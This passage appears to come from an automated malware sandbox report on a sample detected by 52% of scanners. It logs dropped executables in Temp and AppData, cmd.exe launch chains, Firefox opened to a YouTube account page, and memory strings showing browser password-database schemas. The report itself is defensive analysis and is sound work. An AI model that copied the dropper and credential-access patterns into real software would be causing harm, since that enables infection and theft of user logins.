Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 8ec8c5c339.exe, 00000008.00000003.2421887599.00000000229E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: 8NjcvPNvUr.exe

Virustotal: Detection: 52%

Source: 8NjcvPNvUr.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8ec8c5c339.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: 8ec8c5c339.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File read: C:\Users\user\Desktop\8NjcvPNvUr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8NjcvPNvUr.exe "C:\Users\user\Desktop\8NjcvPNvUr.exe"
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 2432
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6704 -s 1312
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2256 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fac9cc89-eaa9-45bc-9cd9-39fa408611c3} 7664 "\\.\pipe\gecko-crash-server-pipe.7664" 238e766c110 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 1028
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77cf4557-a063-4b0f-83a1-cb60c77939fe} 2116 "\\.\pipe\gecko-crash-server-pipe.2116" 28621a6eb10 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2256 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fac9cc89-eaa9-45bc-9cd9-39fa408611c3} 7664 "\\.\pipe\gecko-crash-server-pipe.7664" 238e766c110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77cf4557-a063-4b0f-83a1-cb60c77939fe} 2116 "\\.\pipe\gecko-crash-server-pipe.2116" 28621a6eb10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sppc.dll	Jump to behavior
